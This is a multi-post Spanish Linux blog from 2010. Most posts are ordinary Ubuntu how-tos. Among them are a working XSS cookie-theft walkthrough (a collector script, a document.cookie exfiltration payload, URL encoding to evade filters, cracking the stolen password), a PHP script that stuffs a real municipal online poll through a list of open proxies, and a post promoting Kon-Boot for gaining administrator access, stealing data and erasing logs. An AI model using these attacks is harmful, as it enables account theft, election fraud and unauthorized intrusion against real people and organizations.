jueves, 25 de febrero de 2010

Ubuntu - Problemas con dependencias


Un lector nuestro nos comenta que tiene problemas con las dependencias, al parecer debido a la última actualización de OpenOffice que está dando algunos problemas.

En cualquier caso si no os inicia sesión el sistema, tendremos que entrar en el famoso Recovery Mode (consola pura) y ejecutar ciertos comandos para arreglarlo.

Lo primero de todo es arreglar las dependencias con el comando:
  • sudo apt-get install -f
Si no funcionara porque hubiera algún programa que tiene problemas de dependencias podríamos matarlo con el comando kill y ps.

Una vez muerto el proceso que da problemas tan sólo tendremos que ejecutar el comando anterior de nuevo. Si siguiera dando problemas trataríamos de borrar el paquete que da problemas mediante fuerza bruta con el siguiente comando:

  • sudo dpkg -r --force-all NombrePaquete
Si esto siguiera dando problemas trataríamos de actualizar los paquetes mediante los dos siguientes comandos:
  • sudo apt-get update
  • sudo apt-get install safe-upgrade
Si aún así siguiera dando problemas, antes que formatear existe un comando que nos permite reinstalar todos los paquetes:
  • sudo dpkg-reconfigure -phigh -a

Linux - Matar Procesos por consola


Aunque el monitor de sistema sea bastante efectivo, hay veces en las que para matar un proceso se tarda menos usando la consola. También es útil la consola para ver ciertos procesos ocultos que queremos matar y para saber si tenemos algo extraño como rootkits.

Por todo esto hoy hablaremos del comando ps y de como matar un proceso desde el terminal. Para ver todos los procesos tan sólo tendremos que emplear el siguiente comando:
  • ps -ax
Una vez ejecutado, nos aparecerá una lista bastante grande con todos los procesos y su código identificador, en el cual tendremos que fijarnos para matar al proceso.


El siguiente paso es muy sencillo, sólo hay que usar el comando kill con su respectiva señal para que el proceso se finalice. Para ello ejecutaremos el siguiente comando:
  • kill -9 IDProceso
Si todo ha ido bien nos aparecerá un mensaje indicando que el proceso ha sido matado correctamente :).

lunes, 22 de febrero de 2010

Ubuntu - Ver cuando se activa la webcam.


Uno de nuestros lectores, a propósito del tema de la webcam, nos propuso un programa que nos mostrará en la barra de notificaciones si la webcam se ha activado.

Son muchas las historias que cuentan el espionaje de desconocidos a través de la webcam y como existe cierta paranoia nunca está de más tener un notificador.

El programa que usaremos se llama Camera-Monitor y su uso es realmente fácil. Para instalarlo sólo tendremos que ejecutar el siguiente comando en el terminal:
  • sudo apt-get install cameramonitor
Una vez instalado, pasaremos a configurarlo para que se autoinicie con nuestra sesión. Para ello iremos a Sistema >  Preferencias > Camera Monitor Preferences . Una vez aquí, escogeremos la entrada de vídeo de la webcam y el tiempo en segundos. Activaremos la notificación y cerraremos, como muestra la imagen.


sábado, 20 de febrero de 2010

Ubuntu - Cairo-Dock la barra de MAC


Hace tiempo hablamos de gnome-docky. El sistema es bueno pero no esta nada desarrollado, por eso hoy os recomiendo Cairo-Dock, una potentísima barra de herramientas que usa OpenGL y que no consume demasiados recursos.

Si os diga la verdad, a mi no me gustan nada estas cosas, pierdo el tiempo navegando a través de estas barras pero la verdad que queda muy espectacular ya que esta barra de herramientas contiene numerosos efectos y es muy configurable.

En cualquier caso hoy instalaremos Cairo-Dock y haremos nuestro sistema más parecido al MAC. Instalaremos Cairo-Dock con el siguiente comando de terminal:
  • sudo apt-get install cairo-dock
Una vez instalado lo encontraremos en Aplicaciones > Accesorios > GLX-Dock , lo abriremos y lo configuraremos a nuestro gusto ;)

viernes, 19 de febrero de 2010

Ubuntu - Efectos fotos Webcam


Para los que tengáis envidia de los Maqueros y su programa de hacer fotos con webcam, estáis de enhorabuena. Ubuntu y en general Linux tiene un programita para hacer esto, además es libre.


Cheese nos permite modificar la visión de la webcam con varios efectos para hacer fotos o vídeos. Además podremos descargar efectos extras y hacer el gamba con los amigos que les gusten hacer el tonto.

Para instalarlo es muy sencillo. Primero de todo necesitamos una cámara web. Lo siguiente es abrir un terminal y escribir lo siguiente:
  • sudo apt-get install cheese
Una vez instalado lo encontraremos en Aplicaciones > Sonido y Vídeo > Fotomatón Cheese de cámara Web. Lo abrimos, pulsaremos sobre efectos y tomamos unas simples instantáneas. Además víde, acepta incluso ráfagas de fotos para que puedas escoger cual subir cual auténtico posser de Internet.
 *Don ZeYt feeling like a mac user

miércoles, 17 de febrero de 2010

Ubuntu - TiVion Ver televisión en Internet


Existen muchas alternativas para ver la televisión en internet gratis. He escogido una bastante buena porque es un proyecto español, lo que permitirá ver más canales de lo normal y también porque no instala cientos de librerías innecesarias.

TiVion es fácil de instalar y funciona bastante bien aunque la verdad que la cantidad de programas que ofrece no destaca demasiado. En cualquier caso si disfrutas con algunos canales de TDT o te gusta ver Intereconomía antes de tu sesión de sado-maso, instala TiVio, no tienes nada que perder.

Para instalarlo, hay que dar algún paso extra aunque es bastante sencillo. Abre un terminal y ejecuta:
  • sudo add-apt-repository ppa:shakaran/ppa
  • sudo apt-get update
  • sudo apt-get install tivion
Una vez instalado, lo encontraremos en Aplicaciones > Internet > TiVion , Tras abrirlo podremos disfrutar de los canales de varios países, aunque yo no veo la televisión.

El disquette de la muerte - Kon Boot


Kon Boot es una herramienta potentísima escrita en ensamblador que modifica el kernel al vuelo para obtener privilegios de administrador sin romper contraseñas ni cosas extrañas.

Escrito íntegramente en ensamblador para arquitecturas x86, este sencillo programa, que cabe en un disquette, es capaz de entrar como administrador en sistemas Linux y en sistemas comerciales privativos, incluso en sus últimas versiones.

Su funcionamiento es bastante sencillo, metes el disquette o CD, lo inicias desde la unidad que elijas y listo. Iniciará el sistema operativo de la máquina con privilegios de administrador, lo que te permitirá robar información, borrar los logs e irte bailando a otro lado.

Para descargarlo es muy sencillo, simplemente hay que usar el siguiente comando:
Para disquette:
  • wget http://www.piotrbania.com/all/kon-boot/data/FD0-konboot-v1.1-2in1.zip
Para CD:
  • wget http://www.piotrbania.com/all/kon-boot/data/CD-konboot-v1.1-2in1.zip
Si estas pensando en llevar un pen drive cargadito de herramientas de seguridad, esta no debe faltarte nunca. Os invito a que lo probéis.

martes, 16 de febrero de 2010

Cine - Documental caso !Hispahack

Bueno, a pesar de que este documental es antiguo y tiene un toque retro con gente que la verdad no se que pinta ahí, se menciona el caso !Hispahack y salen algunos de sus miembros. También sale algún que otro flipado pero esta bien.
Disfrutarlo!

Privacidad 3: NoScript - Bloquea javascript y otras malas compañías.


Sin duda, poder bloquear la publicidad está muy bien. Desde mi punto de vista no es muy ético pero cada persona puede hacer con sus ciclos de ordenador lo que quiera. El problema radica principalmente en que muchos webmasters tienen que pagar las malas acciones de ciertas agencias y mayoristas de la publicidad acepten banners flash con sonidos molestos y que sólo consumen recursos. Ante este potente problema la industria busca soluciones como bloquear a los que usen AdBlockPlus.

En cualquier caso, como no creemos en estos sistemas, os recomiendo directamente que empleéis la extensión para firefox NoScript. Su funcionamiento es bastante sencillo. Puedes bloquear javascript globalmente y no tener ningún problema de ClickJacking y seguridad al navegar, o desactivar ciertas cosas que sólo sirven para molestar. No obstante, también te protegerá contra ataques XSS y ciertas actividades maléficas como los cruces de dominios ante los que cualquier usuario normal ni se daría cuenta.

Para instalarlo es muy sencillo, iremos a la página del complemento y pulsaremos sobre Añadir a Firefox. Una vez instalado y reiniciado el navegador nos encotraremos en la parte inferior con un pequeño icono parecido a este:
 
Simplemente, permitiremos JavaScript Globalmente y bloquearemos ciertos scripts que no nos interesan como el de Google Adsense, Google Analytics (para ver que sitios visitamos) y ciertas cosas que nos molesten bastante como los popups de megavideo etc...

Sí, todo esto es bloqueable. No obstante según su creador, un experto en seguridad web, de verdad de la buena, Giorgio Maone, lo mejor es tener javascript desbloqueado globalmente y permitir los scripts que nosotros queramos meter en nuestra lista blanca, youtube, megavideo, etc... 

Para permitirlo sería tan sencillo como entrar en cualquier página, y ver que nos aparece debajo de la barra de direcciones los scripts que han sido bloqueados. Permitiremos los que queramos y listo :)
 


GScan2PDF - Escanea documentos a pdf y usa el OCR


Uno de nuestros lectores nos ha propuesto un tema bastante interesante. Para los usuarios que se pregunten si un escáner funciona bajo Linux, la respuesta es sí. Sin duda una de las herramientas más potentes que se pueden recordar es el OCR (Optical Character Recognition) que nos permite escanear un documento y poder editarlo con nuestra suite ofimática favorita, muy útil para pasar apuntes a limpio con muy poco trabajo.

En cualquier caso, y dando ciertas pautas para que no haya problemas, recomiendo que las fórmulas matemáticas e imágenes las metáis en un cuadrado negro hecho a boli o rotulador. Así el sistema las escaneará como imágenes. El resto del texto, con que tengáis un poco de buena letra y seáis más o menos limpios no dará demasiados errores.


Para hacer esto usaremos el programa GScan2PDF que lo podréis encontrar en los repositorios oficiales, lo que te ahorrará algún que otro dolor de cabeza.
Para instalarlo es tan sencillo como abrir un terminal y ejecutar el siguiente comando:
  •  sudo apt-get install gscan2pdf
Una vez instalado,  lo podremos encontrar en Aplicaciones > Gráficos > GScan2Pdf.

Tras abrirlo, pulsaremos sobre el icono del escáner, buscará dispositivos y procederá a escanearlos. Si no tuvieras escáner y te corriera urgencia también podrías conectar una cámara digital y la usaría como dispositivo de entrada de imágenes aunque los resultados pueden variar según la calidad de nuestra cámara.

lunes, 15 de febrero de 2010

Caso !Hispahack


El "caso Hispahack" dio lugar a la primera sentencia en España sobre acceso ilegal a un sistema informático y fue la primera redada dirigida específicamente contra un grupo hacker.
 

La investigación policial se inició a partir de una queja, que no llegó a ser una denuncia oficial, de Telefónica. Dicha queja trataba sobre un intento de acceso mediante Internet a ordenadores de la NASA, en Estados Unidos, y a ordenadores de la Universidad de Oxford. También se suponía que el grupo estaba relacionado con la modificación de una página web del Congreso de los Diputados de España.
 
Posteriormente, el 20 de enero de 1998, un Proveedor de Servicios de Internet puso una denuncia contra dos personas apodadas Magne y Stk. La segunda era miembro de !Hispahack. Según el proveedor, habían entrado en sus máquinas y robado claves de acceso y nombres de 2.500 clientes. Meses después, el 25 de marzo, la Universitat Politècnica de Catalunya(UPC) presentaba otra denuncia, por un ataque acontecido el 11 de septiembre de 1997, que culminó con la obtención de privilegios de administrador en dieciséis ordenadores y la instalación de sniffers en cinco. Jfs, de !Hispahack, fue acusado de ello.

Según la versión del Equipo de Respuesta a Emergencias Informáticas de la UPC (esCERT), que llevó a cabo esta investigación, Jfs había instalado mal un sniffer, que grabó todos sus pasos: entraba desde un ordenador desatendido de la Universidad de Oviedo, que usaba como repositorio de programas y puente para asaltar otros sistemas. Los datos recogidos en la UPC eran transferidos al servidor del cibercafé mallorquín La Red Café, a un directorio llamado Jfs donde se accedía con el nombre de usuario hispahack.

En abril de 1998, el Grupo de Delincuencia Informática de la Unidad Central Operativa de la Guardia Civil detuvo a los dos miembros de !Hispahack: Stk y Jfs, y a dos personas más: JR y Magne. Se les acusaba de delitos de revelación de secretos y daños informáticos. Un abogado, Carlos Sánchez Almeida, fue también fue llamado a declarar porque había publicado en Mentes Inquietas un artículo sobre los derechos de los detenidos. Posteriormente, Sánchez Almeida defendería como letrado a !Hispahack en el juicio.

Anselmo del Moral, responsable entonces del Grupo de Delincuencia Informática de la Guardia Civil, explicó por su parte las razones que motivaron la redada en una comparecencia ante la Comisión Especial para Redes Informáticas del Senado, el 30 de septiembre de 1999:
La investigación se basa fundamentalmente en una serie de potenciales presuntos grupos de intrusos informáticos relacionados con una queja procedente de Telefónica sobre un intento de acceso a los ordenadores de la NASA. También se les suponía relacionados con la modificación de una página web del Congreso de los Diputados.
Del Moral se refirió a un asalto, ocurrido el 31 de octubre de 1997, a la web del Congreso de los Diputados, donde alguien dejó la pintada: Cuantos diputados y cuantas comisiones harán falta para descubrir que poner un ordenador en internet no es sólo enchufarlo [Manda Guebos!!...1-3, seguimos avanzando! (!H).
Según "El País, las detenciones de Stk y Jfs se iniciaron por un soplo a la Guardia Civil:
Un buen día les llegó una foto de un grupo de jóvenes encima de cuyos rostros estaba escrito su alias. Uno de ellos era JFS. Otro, STK, Un mensaje decían: Estos son Hispahack y son los responsables de un ataque al Congreso de los Diputados. El ataque al Congreso se había realizado desde Estados Unidos. Poco después, la NASA envió una queja a Telefónica porque alguien, desde España, había intentado asaltar sus ordenadores y había dejado la huella H!. Se verifica que el asalto venía de un proveedor de Girona, quien denuncia que le han sustraido las claves de acceso de 2.500 usuarios. Paralelamente, la Universitat POlitecnica de Catalunya denuncia con seis meses de retraso una serie de incidentes en 16 ordenadores, procedentes de la Universidad de Ovideo. JFS y STK trabajan en Gibnet, la telefónica de Gibraltar. Utilitzando un subterfugio se logra un cita con ellos en la Linea de la Concepción. Pasaron dos días en carcel."
Finalmente, de los cuatro detenidos sólo Jfs fue juzgado, por la intrusión en la UPC. El 28 de mayo de 1999, el juez Juan Carlos Llavona Calderón, del Juzgado de lo Penal 2 de Barcelona, lo absolvía. La sentencia consideraba los hechos probados pero no atribuibles a Jfs, aunque el directorio del cibercafé de Mallorca llevase su apodo:
El acceso se hallaba al alcance de cualquiera que entrase a través del usuario "hispahack" y, por lo tanto, las sospechas no alcanzan la categoría de indicios bastantes como para desvirtuar totalmente la presunción de inocencia.
En la sentencia se definió por primera vez en el ámbito judicial español el fenómeno hacking, identificándolo con el intrusismo informático, un conjunto de comportamientos de acceso o interferencia no autorizados a un sistema informático o red de comunicación electrónica de datos, y la utilización de los mismos sin autorización o más allá de lo autorizado.
El juez aprovechó la sentencia para dar también una definición moral del hacking:
Conductas que, en cuanto suponen de agresión contra el interés del titular de un determinado sistema de que la información que en él se contiene no sea interceptada, resultan tanto más reprobables y aún merecedoras de sanción moral.
El caso generó mucha polémica por la obtención irregular de algunas pruebas, ya que cuatro importantes proveedores de Internet dieron, sin orden judicial, todos los datos de las cuentas de correo que les pidió la Guardia Civil. También se criticó que el esCERT actuase como perito imparcial en el juicio y, a la vez, parte denunciante por su pertenencia a la UPC.
El Caso !Hispahack sentó jurisprudencia en diversos aspectos, por la criminalización del hacking hecha por el juez, la no reprobación a las fuerzas de la ley por obtener información de personas sin autorización judicial y el hecho de aceptar los logs como prueba.

Automatizar extracción de archivos en bash


Hola, ante todo perdón por la falta de nuevos temas. Si os digo la verdad llevo un buen ritmo pero me he quedado sin temas. Os pediría que si tenéis alguna duda, aprovechéis y comentéis pidiendo temas.
En cualquier caso he estado estos días trasteando con bash, el interprete de comandos de Linux y la verdad que las cosas funcionan bastante bien.

En este caso, y como añadido al Tucan, el gestor de descargas, he programado un pequeño script que nos ayudará a extraer todos los ficheros de vídeo de una temporada descargada y copiarlos a la carpeta que deseemos. Se podría añadir el comando de eliminar carpeta pero he decidido no hacerlo porque creo que es mejor borrarlo a a mano por si algo no hubiera salido bien.

Lo primero que necesitaremos es el unrar, que es freeware, (no es software libre). Para instalarlo usaremos el siguiente comando:
  • sudo apt-get install unrar
Una vez instalado, procederemos a descargar una temporada de nuestra serie favorita por descarga directa. Tucan manager por defecto lo guarda en la carpeta descargas. Moveremos estas carpeta en una nueva y procederemos a crear el script.

Para ello abriremos el editor de textos gedit mediante el siguiente comando:
  • gedit
Copiaremos el siguiente código y lo guardaremos en el Escritorio.
extraer.sh
#!/bin/bash
for i in $( ls $HOME/Descargas/T-18/ ); do
    cd $HOME/Descargas/T-18/$i
    extrae=`find *part1.rar`
    unrar e $extrae
    copia=`find *.avi`
    mv $copia $HOME/Descargas/T-18/
    cd ..
    echo Extraído correctamente $i
done
 Dentro del for esta la carpeta de nuestra temporada. Este caso ficticio es la temporada de los Simpsons número 18. Al descargarlo nos encontramos con que son 2 partes por cada capitulo. Sólo basta con extraer la primera pues el programa automáticamente buscará la segunda, tercera etc...

Procederemos a darle los permisos mediante el siguiente comando:
  • chmod u+x $HOME/Escritorio/extraer.sh
Para ejecutarlo tan solo tendremos que ejecutar el siguiente comando:
  • $HOME/Escritorio/extraer.sh
Listo, tras esperar un ratito que es lo que tarda, tendremos nuestra temporada extraída y podremos borrar las carpetas. Un placer para vagos.

jueves, 11 de febrero de 2010

Cine - Hacktivistas, Electrohippies...

Siguiendo nuestras ediciones de documentales interesantes, aquí traemos uno extenso que comenta muchas cosas del mundo alternativo de Internet. La primera parte es la más política y luego aparecen Alan Cox y demás en el documental código linux que ya publicamos!


miércoles, 10 de febrero de 2010

Linux - Gthumb - Redimensiona tus fotos


GIMP es una herramienta muy potente pero resulta a veces complicada para el usuario normal. Algunas distribuciones traen por defecto el editor de fotos F-Spot que está bastante incompleto. Si lo que te interesa es comentar, modificar fotos masivamente y en general redimensionarlas para bajar su peso, te recomiendo Gthumb.

Para instalarlo es muy sencillo, sólo hay que ejecutar el siguiente comando en el terminal:
  • sudo apt-get install gthumb
Una vez instalado lo encontraremos en Aplicaciones > Gráficos > Visor de Imágenes G-Thumb.


Para usarlo es realmente sencillo solo hay que escoger las fotos, buscar las opciones en los menús desplegables y listo. Puedes aplicar efectos, redimensionar, añadir marcas de agua y todo sin un ápice de trabajo.

martes, 9 de febrero de 2010

XSS - Cross Site Scripting


Cada día salen más ataques del tipo XSS, si mal no recuerdo uno de los más sonados fue el de la página de la Moncloa. También hay otros famosos como el de la página de la SGAE en sus búsquedas y el el más reciente, la página de búsquedas de la presidencia española de la UE.

Sin duda, la culpa es de los programadores, no validar las entradas es un error terrible y aunque en estos casos estas vulnerabilidades no fueran explotables nos hacen quedar en ridículo. En cualquier caso hoy trataré de dar la imagen más peligrosa de los XSS para ver si de una vez la gente se mentaliza.

Por ello mismo haremos un simple paseo por scripts tontos y scripts menos tontos. Lo primero de todo es la teoría. La teoría dice que para probar un XSS usaremos un simple document.Alert de javascript para ver si se nos muestra por pantalla la típica ventana de advertencia. A mi me gustan mas los iframes, por ello mismo usaremos este código:
<iframe src=http://donzeyt.blogspot.com>
Para ver si es vulnerable nuestro atacante tan sólo habría que añadir en el campo de búsqueda $_POST o en cualquier parámetro $_GET el siguiente código. Nosotros por comodidad, lo haremos con $_GET.
Vulnerable1.php
<?php
    $seccion = $_GET["seccion"];
    echo "Usted esta en ".$seccion;
?>
Para arreglarlo hubiera sido tan sencillo como:
<?php
    $seccion = htmlentities($_GET["seccion"]);
    echo "Usted esta en ".$seccion;
?>
En cualquier caso probaremos nuestro ataque. Para ello iremos a:
http://nuestroservidor.example.com/Vulnerable1.php?seccion=<iframe src=http://donzeyt.blogspot.com>
Si aparece un iframe con la página es que las cosas funcionan bastante bien y es vulnerable.
 
Perfecto, este es un ejemplo de los mas sencillos. Ahora mismo vamos a pasar al más grave, de la inocentada a lo gordo. El script vulnerable sigue siendo el mismo solo que añadiremos una cookie. Todavía no hemos hablado de esto pero lo veremos por encima.
Vulnerable2.php
<?php
    $seccion = $_GET["seccion"];
    $contraseña = sha1($_GET["pass"]);
    setcookie("contraseña", $contraseña , time()+ 3600);
    echo "Usted esta en ".$seccion;
?>
Una vez guardado crearemos el script al que llamaremos para que guarde la información.
come_cookies.php
<?php
$cookie = $_GET["cookie"];
$fp = fopen("robada.txt", 'w');
fwrite($fp, $cookie);
fclose($fp);
?>
Este script nos guardará las cookies en un fichero de texto y será al que invocaremos. En este caso en vez de usar el iframe, he decidido usar el document location de javascript.
<script>document.location=http://nuestroservidor.example.com/come_cookies.php?cookie=' +document.cookie</script>
Muchos servidores normalmente suelen llevar protección de scripts pero esta es fácilmente saltable codificando nuestra cadena a HEX o directamente mediante la codificación del a URL. Existen gran cantidad de conversores online gratuitos, os recomiendo este. Una vez codificado quedaría así:
%3Cscript%3Edocument.location%3Dhttp%3A%2F%2Fnuestroservidor.example.com%2Fcome_cookies.php%3Fcookie%3D%27++document.cookie%3C%2Fscript%3E
Listo, ya sólo queda atacar, para ello tocará lo siguiente:
http://nuestroservidor.example.com/Vulnerable2.php?pass=hola&seccion=%3Cscript%3Edocument.location%3Dhttp%3A%2F%2Fnuestroservidor.example.com%2Fcome_cookies.php%3Fcookie%3D%27++document.cookie%3C%2Fscript%3E
Si todo ha ido bien, cookie robada, con ella crackearemos la contraseña por fuerza bruta o diccionario y listo.

lunes, 8 de febrero de 2010

PHP - Curl y Proxy (Vota Summercase Boadilla)

Hoy nos sentimos democráticos, por ello mismo, como creemos en las reglas del juego, crearemos un script que votará en una encuesta tantas veces como nuestro número de proxys tengamos.

Para ello mismo, he decidido apoyar a los poppers amigos de lo indie y su festival por excelencia en Madrid, el Summercase.

Resulta que el ayuntamiento de Boadilla (localidad donde se realiza el festival) esta haciendo una encuesta preguntando si se debe seguir realizando el festival y la verdad, no les va muy bien, ya que ganan por poco y seguramente como van las cosas no habrá festival.

Por ello mismo, quiero aportar mi granito de arena. Seguramente tanto voto negativo esté causado por algún vecino anti poperos, con un mínimo conocimiento de programación. A pesar de todo esto, nos valdrá como perfecto ejemplo de como no hacer en la vida una encuesta. Como errores destacan: no hay Captcha y la única medida de seguridad que aporta es 1 voto por IP por día. Pues ya está, PROXYs a cholón y listo.

Lo primero de todo que necesitaremos, será una lista de proxys, en internet hay muchísimas, yo os adjunto una que es un poco mala pero no importa. El único requisito que tiene que cumplir vuestra lista es el siguiente: ip:puerto, una proxy por cada línea y que el fichero se llame proxys.txt

Aquí os dejo un ejemplo:
proxys.txt
125.163.255.154:8080
95.56.230.12:80
92.61.240.22:80
95.104.116.82:8080
121.31.126.93:80
87.250.47.219:8080
89.31.6.24:8080
84.20.81.196:8080
125.160.162.16:8080
202.143.146.205:8080
119.6.253.31:8000
208.180.65.242:8080
121.14.158.75:80
201.48.212.166:80
117.25.177.242:8080
200.141.202.162:8080
119.2.42.163:8080
202.90.112.43:8080
187.5.91.82:8080
208.180.60.126:8080
200.226.251.217:80
221.1.223.10:808
220.178.47.253:8080
202.159.90.163:80
202.57.33.134:8008
115.31.64.12:8008
189.108.142.5:8080
124.82.221.194:8080
41.154.7.52:8080
203.172.138.211:8080
200.25.200.178:8080
190.203.34.86:8080
200.3.170.210:80
201.72.7.2:80
202.143.129.200:8080
212.184.79.66:80
201.2.110.84:8080
200.14.96.57:80
119.70.40.102:8080
41.243.216.27:8080
217.10.246.4:8080
87.98.249.24:80
202.152.59.235:80
186.56.68.6:8080
119.70.40.101:8080
200.91.248.82:80
189.41.69.151:80
219.90.91.69:8080
190.228.70.4:80
114.57.172.78:80
125.162.38.175:8080
74.206.98.202:8080
222.66.116.108:8080
121.14.158.76:80
84.20.81.196:80
Una vez guardado el fichero, procederemos a crear el script en php que está bastante comentado por lo que sólo tenéis que leerlos para enteraros de  que hace.
vota_summercase.php
<?php
/*
 *      vota_summercase.php
 *     
 *      Copyright 2010 Don ZeYt
 *     
 *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *     
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *     
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
 *      MA 02110-1301, USA.
 */
//Abrimos archivos de proxy
$archivo = "proxys.txt";
$f = fopen($archivo, "r");
$datos = fread($f, filesize($archivo));
fclose($f);
//Creamos array de proxys
$datos = explode("\n",$datos);
//URL votacion
$URL ="http://www.aytoboadilla.com/opinion/encuesta.asp";
//Inicializamos contadores
$error=0;
$acierto=0;
$proxy_error=0;
//Bucle para todas las proxys
foreach($datos as $d){
    //Separamos puerto de IP
    $d= explode(":",$d);
    $ip=$d[0];
    $puerto=$d[1];
    //Usamos CURL
    $ch = curl_init();
    echo $ip." ".$puerto."\n";
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_PROXY, $ip);
    curl_setopt($ch, CURLOPT_PROXYPORT, $puerto);
    curl_setopt($ch, CURLOPT_URL, $URL);
    curl_setopt ($ch, CURLOPT_POSTFIELDS, "respuesta=r1");
    curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT, 5);
    $datos = curl_exec($ch);
    curl_close($ch);
    //Si no son vacios
    if ($datos != ""){
        if (!ereg("contabilizado",$datos)){
            $error++;
            echo "Error ".$error."\n";
        }else{
            $acierto++;
            echo "Acierto ".$acierto."\n";
        }
    }else{
        $proxy_error++;
        echo "Error Proxy ".$proxy_error."\n";
    }
}
echo "Aciertos: ".$acierto." Errores: ".$error." Errores de Proxy: ".$proxy_error;
?>
Una vez guardado, el único requisito es que estén los dos archivos en el mismo directorio. Ahora bien, para votar sólo habrá que ejecutar el script. Si es tu primera vez leyendo este blog, para poder ejecutarlo necesitarás GNU/Linux con geany , geany con php, php5 y curl. También es valido cualquier editor, incluso subir el script a un servidor.
¡Si usas otro sistema operativo búscate la vida!

domingo, 7 de febrero de 2010

Web: W3AF Análisis de Seguridad de tu web


A pesar de la existencia de muchas distribuciones con herramientas de seguridad como BugTraq, hoy hablaremos de W3AF, una herramienta libre para la auditoría de seguridad de páginas web, tanto nuestras como ajenas, no sé si me entendéis...

Para ello usaremos la herramienta W3AF, un completo kit de herramientas en el que podremos auditar, usar fuerza bruta y en resumen recaudar toda la información posible sobre una web.

Para instalarlo es muy sencillo, sólo hay que ejecutar el siguiente comando en el terminal:
  • sudo apt-get install w3af
Una vez instalado, lo ejecutaremos en Aplicaciones > Internet > W3AC . Una vez abierto, escogeremos los perfiles que nos vienen por defecto. En este caso recomiendo audit_high_risk y full audit que nos permitirá buscar todos los fallos de nuestra web. Entre ellos se encuentran inyecciones SQL, XSS y salto de directorios.


Para iniciarlo sólo tendremos que insertar en el campo target nuestra página web, un ejemplo podría ser http://donzeyt.blogspot.com aunque dudo encontréis nada porque en google suelen hacer un buen trabajo.

En resumen, con esta herramienta podrás auditar tu propia web u otra cualquiera, encontrar fallos, corregirlos o explotarlos y lo que os venga en gana.

sábado, 6 de febrero de 2010

Privacidad 2: Proxys 1: Introducción y fundamentos.


En la primera edición de privacidad hablamos sobre ocultar los datos del navegador y sistema operativo y vimos como se nos quedaron en el aire algunos datos como nuestra IP, a través de la cual podían saber nuestro ISP y por lo tanto nuestra procedencia con un error máximo de 100 km (se estima) mediante geoiplocalización.

Por todo esto trataremos de ponérselo más difícil mediante el uso de los proxys. Por ello mismo indicaremos que son, para que sirven y como usarlos.
QUÉ ES UN PROXY

A pesar de que su uso más conocido es el anonimato para la navegación, los proxys tienen muchas funcionalidades. Los de navegación web son los más empleados por diversos motivos, principalmente la seguridad y el rendimiento. Su funcionamiento es muy sencillo, ciertos clientes realizan peticiones a un servidor, este las trata y devuelve la respuesta a los clientes.

TIPOS DE PROXY
Reverse proxy: Como índica su nombre es un proxy inverso, es decir, todo el tráfico que va al cliente pasa primero por el servidor. Es muy utilizado como capa extra de seguridad o como filtrado de tráfico. También se consideran los balanceadores de carga como proxys inversos.

Proxy NAT: Todos los que usamos un Router tenemos este tipo de proxy. Sencillamente se emplea para compartir una misma dirección IP por varios ordenadores. Según al puerto que accedamos entraremos a un ordenador a otro mediante Network Adress Translation (NAT).
Proxys Abiertos: Estos son los más interesantes ya que permiten hacer peticiones a cualquier usuario de Internet. Tiene sus ventajas y sus desventajas pero permiten navegar a muchos usuarios que no pueden. El empleo de estos suele tener algunas restricciones ya que mucha gente oculta su IP para cometer perrerías a través de estos.

CÓMO USARLOS
Se pueden usar proxys en casi todas las aplicaciones pero no quiero atormentaros por lo que nos centraremos en la web proxy mediante FireFox. Para ello usaremos la extensión FoxyProxy para este popular navegador. Para ello iremos a la página y lo instalaremos, una vez instalado, reiniciaremos el navegador. Nos aparecerá abajo a la derecha un cartelito rojo indicando que FoxyProxy está deshabilitado. Para habilitarlo es tan sencillo como hacer click con el botón secundario y escoger opciones. En la pantalla escogeremos, añadir nuevo proxy y añadiremos los datos de una lista de proxys. En este caso he escogido 76.27.93.88:3128 desde Estados Unidos. La IP es 76.27.93.88 y el puerto 3128. Pondremos un nombre, la descripción del país y en la pestaña detalles pondremos la IP y el puerto. El socket es v5. Aceptaremos, y en la barra de estado, donde hicimos antes click con el botón secundario lo volveremos a hacer y escogeremos nuestra proxy. Entraremos en danasoft de nuevo y listo, ahora somos estadounidenses.
Este sistema se puede utilizar también para saltarse las limitaciones de megavideo, megaupload etc... y las restricciones de streaming de vídeo sólo disponibles para ciertos países.

En próximas entregas, hablaremos de proxys más avanzadas y de sistemas como TOR y derivados, y de como ayudar a navegar a los que no pueden.

viernes, 5 de febrero de 2010

Linux - Programa pago IVA AEAT


A petición de uno de nuestros lectores y tras apreciar lo grave que es que como siempre, den soporte muy escaso para Linux en cosas estatales, escribo un tema que a muchos les dará igual pero que en un futuro tendrá su importancia.

Los programas de la Seguridad Social en general están programados en JAVA ya que es multiplataforma. Lo sé porque tuve un amigo que estuvo trabajando allí 1 año. En cualquier caso jamás pensé que el instalador de Linux estuviera tan dejado.
En cualquier caso haremos una mini guía para ver como se instala este programa y para hacerlo funcionar correctamente.

Lo primero de todo, descargaremos el instalador de la aplicación ejecutando lo siguiente en un terminal:
  • wget http://www.aeat.es/AEAT/Contenidos_Comunes/La_Agencia_Tributaria/Descarga_Programas/Descarga/Java/IVA/2009/v1.0/siva9100.bin
Una vez descargado, suponiendo que esté en el Escritorio procederemos a darle los permisos para poder ejecutarlo mediante los siguientes comandos:
  • cd Escritorio
  • sudo chmod +x siva9100.bin
Una vez dado los permisos ejecutaremos el instalador mediante el comando:
  • ./siva9100.bin
Nos aparecerá un instalador bastante  feo. Pulsaremos siguiente hasta que nos pida la ubicación de la máquina virtual de java. Para ello, le daremos a examinar y escogeremos:
/usr/lib/jvm/java-6-openjdk/bin/java
 Una vez escogido, pulsaremos sobre siguiente y nos preguntará sobre una ruta de instalación. Escogeremos la siguiente ruta:
/home/TuUsuario/AEAT
Si no existiera la carpeta la crearíamos mediante el siguiente comando:
  • mkdir AEAT
Una vez escogido el directorio,  pulsaremos sobre siguiente y nos preguntará sobre dónde poner los enlaces simbólicos. Escogeremos en la misma carpeta y pulsaremos sobre siguiente. Una vez terminado, ejecutaremos el programa, para ello, crearemos un lanzador y en la ubicación escogeremos:
/home/TuUsuario/AEAT/aeat390j
